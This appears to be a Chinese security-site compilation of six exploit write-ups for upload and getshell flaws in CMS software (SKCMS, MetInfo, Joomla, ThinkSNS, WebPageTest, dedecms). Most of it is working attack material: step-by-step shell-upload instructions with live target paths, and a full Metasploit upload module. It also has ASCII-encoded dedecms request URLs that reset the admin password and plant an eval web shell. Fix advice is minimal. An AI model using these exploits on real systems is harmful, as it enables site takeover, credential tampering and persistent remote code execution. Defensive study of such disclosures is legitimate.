SKCMS存在任意文件上传漏洞可直接getshell漏洞预警

下面是小编为大家推荐的SKCMS存在任意文件上传漏洞可直接getshell漏洞预警(共含6篇），欢迎阅读，希望大家能够喜欢。同时，但愿您也能像本文投稿人“关中大侠吕轻侯”一样，积极向本站投稿分享好文章。

篇1：SKCMS存在任意文件上传漏洞可直接getshell漏洞预警

上传漏洞，无需后台权限直接上传，无过滤，导致文件非法上传！

SKCMS/upload/swfupload/load.asp

www.0day5.com/SKCMS/upload/swfupload/load.asp

SKCMS/upload/file_manager_json.asp

​

篇2：MetInfov5.1.3 任意文件上传漏洞漏洞预警

MetInfo 23号发布了新版本5.1.5，修补了本文提到的漏洞，当然严格来说应该是任意变量覆盖漏洞....

ps：欢迎各种形式，首发t00ls.net

注：请勿利用本文内容从事一切非法活动，否则后果自负

author:my5t3ry

废话不多说，看代码：

includecommon.inc.php20-39$db_settings=parse_ini_file(ROOTPATH.'config/config_db.php');@extract($db_settings);require_once ROOTPATH.'include/mysql_class.php';$db=newdbmysql;$db->dbconn($con_db_host,$con_db_id,$con_db_pass,$con_db_name);define('MAGIC_QUOTES_GPC',get_magic_quotes_gpc());isset($_REQUEST['GLOBALS'])&&exit('Access Error');require_once ROOTPATH.'include/global.func.php';foreach(array('_COOKIE','_POST','_GET')as$_request){foreach($$_requestas$_key=>$_value){$_key{0}!='_'&&$$_key=daddslashes($_value);}}$query=“select * from {$tablepre}config where name='met_tablename' and lang='metinfo'”;$mettable=$db->get_one($query);$mettables=explode('|',$mettable[value]);foreach($mettablesas$key=>$val){$tablename='met_'.$val;$$tablename=$tablepre.$val;}

metinfo系统通过查询数据库的{$tablepre}config表，并将获取的结果通过foreach循环初始化表名变量，其中的

是通过代码

$db_settings = parse_ini_file(ROOTPATH.'config/config_db.php'); @extract($db_settings);

来初始化的，然后在系统中使用这样“SELECT * FROM $met_message where id=$id and lang='$lang'”的SQL查询数据库，

其中的$met_message变量就是前面foreach循环初始化的变量……

我们可以覆盖$tablepre变量使表名初始化失败，进而提交表名变量.....

我找了个后台的上传页面，通过覆盖变量绕过后台验证并且覆盖允许上传后缀列表，构造上传漏洞，

MetInfov5.1.3 任意文件上传漏洞漏洞预警

，

exp：任意文件上传

任意文件上传

篇3：Joomla远程上传漏洞 可直接getshell

作者：1337

1. 有些joomal需要先注册.

site/index.php?option=com_user&view=login

2. 到上传地址

/index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en

3. 点击image后点击upload,选择shell, 将shell重名为adm1n.php.jpg格式.

4. 上传后的文件在/ images/ksadvertiser/U0 这个目录下.

site/images/ksadvertiser/U0/adm1n.php.gif

Demo: alt.kiss-software.de/images/ksadvertiser/U0/403.php.gif

修复：

已通知官方

篇4：ThinkSNS又一个任意上传文件漏洞漏洞预警

某模块未对上传文件类型进行验证，可上传任意文件

​

代码产生位置

appswapLibActionIndexAction.class.php

263行

if(!empty($_FILES['pic']['name'])) { // 自动发一条图片微博

$data['pic']   = $_FILES['pic'];

$data['content'] = '图片分享';

$data['from']  = $this->_type_wap;

$res = api('Statuses')->data($data)->upload;

}

未对文件类型过滤

访问wap 模块

发一条微博并传图

firebug 地址

​

去掉small_然后访问

www.myhack58.com/data/uploads//1023/17/50865d481c217.php

修复方案：

对上传类型要进行检查

篇5：WebPageTest任意php文件上传漏洞预警

##

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# metasploit.com/framework/

##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient

def initialize(info={})

super(update_info(info,

'Name' => “WebPageTest Arbitrary PHP File Upload”,

'Description' => %q{

This module exploits a vulnerability found in WebPageTest's Upload Feature. By

default, the resultimage.phpfile does not verify the user-supplied item before

saving it to disk, and then places this item in the web directory accessable by

remote users. This flaw can be abused to gain remote code execution.

},

'License' => MSF_LICENSE,

'Author' =>

[

'dun', #Discovery, PoC

'sinn3r' #Metasploit

],

'References' =>

[

['OSVDB', '83822'],

['EDB', '19790']

],

'Payload' =>

{

'BadChars' => “x00”

},

'DefaultOptions' =>

{

'ExitFunction' => “none”

},

'Platform' => ['php'],

'Arch' => ARCH_PHP,

'Targets' =>

[

['WebPageTest v2.6 or older', {}]

],

'Privileged' => false,

'DisclosureDate' => “Jul 13 2012”,

'DefaultTarget' => 0))

register_options(

[

OptString.new('TARGETURI', [true, 'The base path to WebPageTest', '/www/'])

], self.class)

end

def check

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

res1 = send_request_raw({'uri'=>“#{base}/index.php”})

res2 = send_request_raw({'uri'=>“#{base}/work/resultimage.php”})

if res1 and res1.body =~ /WebPagetest - Website Performance and Optimization Test/ and

res2 and res2.code == 200

return Exploit::CheckCode::Vulnerable

end

return Exploit::CheckCode::Safe

end

def on_new_session(cli)

if cli.type != “meterpreter”

print_error(“No automatic cleanup for you. Please manually remove: #{@target_path}”)

return

end

cli.core.use(“stdapi”) if not cli.ext.aliases.include?(“stdapi”)

cli.fs.file.rm(@target_path)

print_status(“#{@target_path} removed”)

end

def exploit

peer = “#{rhost}:#{rport}”

target_uri.path << '/' if target_uri.path[-1,1] != '/'

base = File.dirname(“#{target_uri.path}.”)

p = payload.encoded

fname = “blah.php”

data = Rex::MIME::Message.new

data.add_part(

“

'multipart/form-data', #Content Type

nil, #Transfer Encoding

”form-data; name=“file”; filename=“#{fname}”“ #Content Disposition

)

print_status(”#{peer} - Uploading payload (#{p.length.to_s} bytes)...“)

res = send_request_cgi({

'method' => 'POST',

'uri' => ”#{base}/work/resultimage.php“,

'ctype' => ”multipart/form-data; boundary=#{data.bound}“,

'data' => data.to_s

})

if not res

print_error(”#{peer} - No response from host“)

return

end www.xxxxo.com

@target_path = ”#{base}/results/#{fname}“

print_status(”#{peer} - Requesting #{@target_path}“)

res = send_request_cgi({'uri'=>@target_path})

handler

if res and res.code == 404

print_error(”#{peer} - Payload failed to upload“)

end

end

end

篇6：dedecms版本修改任意管理员漏洞及getshell漏洞预警

此漏洞无视gpc转义，过80sec注入防御，

补充下，不用担心后台找不到。这只是一个demo，都能修改任意数据库了，还怕拿不到SHELL？

起因是全局变量$GLOBALS可以被任意修改，随便看了下，漏洞一堆，我只找了一处。

include/dedesql.class.php

if(isset($GLOBALS['arrs1']))

{

$v1 = $v2 = '';

for($i=0;isset($arrs1[$i]);$i++)

{

$v1 .= chr($arrs1[$i]);

}

for($i=0;isset($arrs2[$i]);$i++)

{

$v2 .= chr($arrs2[$i]); //解码ascii

}

$GLOBALS[$v1] .= $v2; //注意这里不是覆盖，是+

}

function SetQuery($sql)

{

$prefix=”#@__“;

$sql = str_replace($prefix,$GLOBALS['cfg_dbprefix'],$sql); //看到这里无话可说，不明白为什么要这样做。

$this->queryString = $sql;

另外说下绕过80sec防注入的方法。

同一文件中，有两个执行SQL的函数。ExecuteNoneQuery和ExecuteNoneQuery2

而用ExecuteNoneQuery2执行SQL并没有防注入，于是随便找个用ExecuteNoneQuery2执行的文件。

plus/download.php

else if($open==1)

{

$id = isset($id) && is_numeric($id) ? $id : 0;

$link = base64_decode(urldecode($link));

$hash = md5($link);//这里的#@_是可以控制的

$rs = $dsql->ExecuteNoneQuery2(”UPDATE `#@__downloads` SET downloads = downloads + 1 WHERE hash='$hash' “);

if($rs ExecNoneQuery($query);

}

header(”location:$link");

exit();

}

构造SQL语句 (提交的时候用ascii加密，程序会帮我们自动解密的，所以无视gpc)：

admin` SET `userid`=’spider’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #

完整SQL语句:

UPDATE `dede_admin` SET `userid`=’spider’, `pwd`=’f297a57a5a743894a0e4′ where id=1 #_downloads` SET downloads = downloads + 1 WHERE hash=’$hash’

EXP:

localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=97&arrs2[]=100&arrs2[]=109&arrs2[]=105&arrs2[]=110&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=117&arrs2[]=115&arrs2[]=101&arrs2[]=114&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=115&arrs2[]=112&arrs2[]=105&arrs2[]=100&arrs2[]=101&arrs2[]=114&arrs2[]=39&arrs2[]=44&arrs2[]=32&arrs2[]=96&arrs2[]=112&arrs2[]=119&arrs2[]=100&arrs2[]=96&arrs2[]=61&arrs2[]=39&arrs2[]=102&arrs2[]=50&arrs2[]=57&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=55&arrs2[]=97&arrs2[]=53&arrs2[]=97&arrs2[]=55&arrs2[]=52&arrs2[]=51&arrs2[]=56&arrs2[]=57&arrs2[]=52&arrs2[]=97&arrs2[]=48&arrs2[]=101&arrs2[]=52&arrs2[]=39&arrs2[]=32&arrs2[]=119&arrs2[]=104&arrs2[]=101&arrs2[]=114&arrs2[]=101&arrs2[]=32&arrs2[]=105&arrs2[]=100&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

如果不出问题，后台登录用户spider密码admin

漏洞真的不止一处，各种包含，远程代码执行，很多，列位慢慢研究，

如果找不到后台，参见以前修改数据库直接拿SHELL的方法

UPDATE `dede_mytag` SET `normbody` = ‘{dede:php}file_put_contents(”spider.php”,””);{/dede:php}’ WHERE `aid` =1 LIMIT 1 ;

GETSHELL:

localhost/plus/download.php?open=1&arrs1[]=99&arrs1[]=102&arrs1[]=103&arrs1[]=95&arrs1[]=100&arrs1[]=98&arrs1[]=112&arrs1[]=114&arrs1[]=101&arrs1[]=102&arrs1[]=105&arrs1[]=120&arrs2[]=109&arrs2[]=121&arrs2[]=116&arrs2[]=97&arrs2[]=103&arrs2[]=96&arrs2[]=32&arrs2[]=83&arrs2[]=69&arrs2[]=84&arrs2[]=32&arrs2[]=96&arrs2[]=110&arrs2[]=111&arrs2[]=114&arrs2[]=109&arrs2[]=98&arrs2[]=111&arrs2[]=100&arrs2[]=121&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=32&arrs2[]=39&arrs2[]=123&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=102&arrs2[]=105&arrs2[]=108&arrs2[]=101&arrs2[]=95&arrs2[]=112&arrs2[]=117&arrs2[]=116&arrs2[]=95&arrs2[]=99&arrs2[]=111&arrs2[]=110&arrs2[]=116&arrs2[]=101&arrs2[]=110&arrs2[]=116&arrs2[]=115&arrs2[]=40&arrs2[]=39&arrs2[]=39&arrs2[]=120&arrs2[]=46&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=39&arrs2[]=39&arrs2[]=44&arrs2[]=39&arrs2[]=39&arrs2[]=60&arrs2[]=63&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=32&arrs2[]=101&arrs2[]=118&arrs2[]=97&arrs2[]=108&arrs2[]=40&arrs2[]=36&arrs2[]=95&arrs2[]=80&arrs2[]=79&arrs2[]=83&arrs2[]=84&arrs2[]=91&arrs2[]=109&arrs2[]=93&arrs2[]=41&arrs2[]=59&arrs2[]=63&arrs2[]=62&arrs2[]=39&arrs2[]=39&arrs2[]=41&arrs2[]=59&arrs2[]=123&arrs2[]=47&arrs2[]=100&arrs2[]=101&arrs2[]=100&arrs2[]=101&arrs2[]=58&arrs2[]=112&arrs2[]=104&arrs2[]=112&arrs2[]=125&arrs2[]=39&arrs2[]=32&arrs2[]=87&arrs2[]=72&arrs2[]=69&arrs2[]=82&arrs2[]=69&arrs2[]=32&arrs2[]=96&arrs2[]=97&arrs2[]=105&arrs2[]=100&arrs2[]=96&arrs2[]=32&arrs2[]=61&arrs2[]=49&arrs2[]=32&arrs2[]=35

update成功后，访问下127.0.0.1/plus/mytag_js.php?aid=1

会在plus目录生成 x.php 密码 m

127.0.0.1/plus/x.php

失败原因：

测试发现，如果aid为空或已经生成过一次，则会写shell失败….更改倒数第三个ascii改变改变aid(即&arrs2[]=49)

★ Joomla远程上传漏洞 可直接getshell

★ eWebeditoR3.8 for php任意文件上传EXP漏洞预警

★ 网上商城EDSC V2.1 任意文件上传漏洞漏洞预警

★ ECSHOP跨站+后台文件包含=Getshell漏洞预警

★ dedecms 5.7 edit.inc.php文件注射漏洞预警

★ JJDD.COM绕过权限验证任意留言评论漏洞预警

★ shopxp pinglun.asp文件SQL注入漏洞分析漏洞预警

★ Thaiweb远程文件sql注入漏洞0day漏洞预警

★ FCKeditor漏洞利用总结漏洞预警

★ include本地文件包含漏洞随想